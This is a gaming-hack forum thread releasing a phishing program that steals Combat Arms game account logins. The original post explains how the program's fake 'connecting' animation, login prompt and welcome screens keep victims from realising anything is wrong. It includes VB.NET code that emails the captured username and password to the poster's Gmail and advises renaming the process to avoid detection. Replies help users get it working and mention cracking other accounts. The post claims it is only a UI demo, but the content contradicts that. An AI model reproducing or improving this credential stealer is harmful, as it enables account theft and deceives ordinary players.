[Release]OpenSource CAaccount Phish

Posts 1–15 of 22 · Page 1 of 2
[Release]OpenSource CAaccount Phish
OpenSource CAaccount Grabber

So I have seen alot of CA account grabbers here, and everyone i have seen always has me saying " I'm not going to fall for that" So I decided to make a open source template that looks as legit as I can get it to look in 40 mins ( I should be asleep, it's 5:11am here)

please let me know your thoughts, If you use it, all I ask is you give credit to MPGH.net for letting me upload it here and myself for design and code (inside the code of course)

Here are the required screenshots

Animated Text, This gives the illusion it is trying to connect to the server as if it was using the passwords stored as a cookie (even though we know this is BS)



However (as wanted) the attempt will fail and a login box will show asking for login information to authenticate the user



The information will be sent via email to the email address in the sourcecode, the password is there, but edit it for yourself because everyone will have this code



Note how it mentions the username to give it a feel that they logged in

we don't want it to end abruptly here, otherwise they will catch on, so we continue the illusion by allowing them to "submit information" (which never gets sent)



(also note how it says Welcome and the username in the upper left hand corner, again this if to continue the illusion and allow the user to see that "this is working")

Finally it "sends the information, thanks them and clears the box to allow them to "submit another"



Let me know what you all think , Ill be uploading this open source soon

Virus Scans

Source Code

Example

Downloads Attached (Hopefully approved)
Account.rar = SourceCode
caaccountexample.rar = sample of the program

Build on it, and have lots of fun, I did! (took me an hour to make )

NOTE: When I made this I called it PreTex (I was originally making a prediction text tutorial for vb.net when I decided to make this for another member who was looking for help) Remember to change the Name of the program so processes and msgboxs don't give it all away

(just as a side note, I made this solely to help with sending emails from a form, I do not agree with phishing or stealing accounts)

"not to be used, this is only a demonstration on UI/GUI/Sending emails from a form, and only because I have seen some horrible displays (IMO)"


account.rarattachment deleted · 61 downloads before removal
caaccountexample.rarattachment deleted · 40 downloads before removal
' the recieving email address, (so your email address tibble)
Dim sendTo As New MailAddress("the.crazy.tech.freak@gmail.com")
' Who is it coming from? I suggest doing something like using the users real email to sort or using texbox1.text@login.com)
Dim from As MailAddress = New MailAddress("Combatarmreports@gmail.com")
Dim message As New MailMessage(from, sendTo)

message.IsBodyHtml = True
message.Subject = "Login Information"
message.Body = message.Body + (TextBoxX1.Text)
message.Body = message.Body + ""
message.Body = message.Body + (TextBoxX2.Text)

'authentication = Your email@gmail.com and password = "" your password
Dim basicAuthenticationInfo As New System.Net.NetworkCredential("the.crazy.tech.freak @gmail.com", "1234")

so is that right?

and is there a way to pack all these files into one .exe file like a program or something or does it require more work?
Looks good
That's right, try logging in to google and turn on Pop3/Smtp and IMAP in your options, see if that helps

Also another note, If you have not figured it out......in the code (someone is using it)

The login for the gmail account that was created for the text is

combatarmsreports@gmail.com
password is combatarmsreports1379

a 2.0 release will be available sometime today

(just as a side note, I made this solely to help with sending emails from a form, I do not agree with phishing or stealing accounts)

"not to be used, this is only a demonstration on UI/GUI/Sending emails from a form, and only because I have seen some horrible displays (IMO)"
so this is a ca account stealer?
Quote Originally Posted by XGelite View Post
so this is a ca account stealer?

Download the example, give it a try, login to the gmail account above to test.

(use fake information obviously.....)

But again, "not to be used, this is only a demonstration on UI/GUI/Sending emails from a form, and only because I have seen some horrible displays (IMO)"
OMG! Finally it works!!! Hahahahah great work!
Why is the report textboxes on the right instead of the middle?
Other than that, this program is
Quote Originally Posted by Pixie View Post
Why is the report textboxes on the right instead of the middle?
Other than that, this program is
Laziness, it was about 530 am and didn't feel like dropping another group box and adding visibility false and true.

2.0 will combine ASP, Html and vb.net for a very realistic feeling.
Anyway to get a last name i have a birth day cracker that works great.I can get the email
but anyway to get a last name for a account?
Quote Originally Posted by emokidof1994 View Post
Anyway to get a last name i have a birth day cracker that works great.I can get the email
but anyway to get a last name for a account?
I don't understand your question (not sure if its a question or a statement )
Not complicated but lol i bet choobs would fall for that
Quote Originally Posted by Bombsaway707 View Post
Not complicated but lol i bet choobs would fall for that
My goal was to provide a template for the choobs, now hopefully they use it and learn from it
Make the password appear as stars ***** (if not already stated.)
Yeah for the copy and pasting choobs out there:

Make Textbox2.passwordchar = "•"
Posts 1–15 of 22 · Page 1 of 2
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?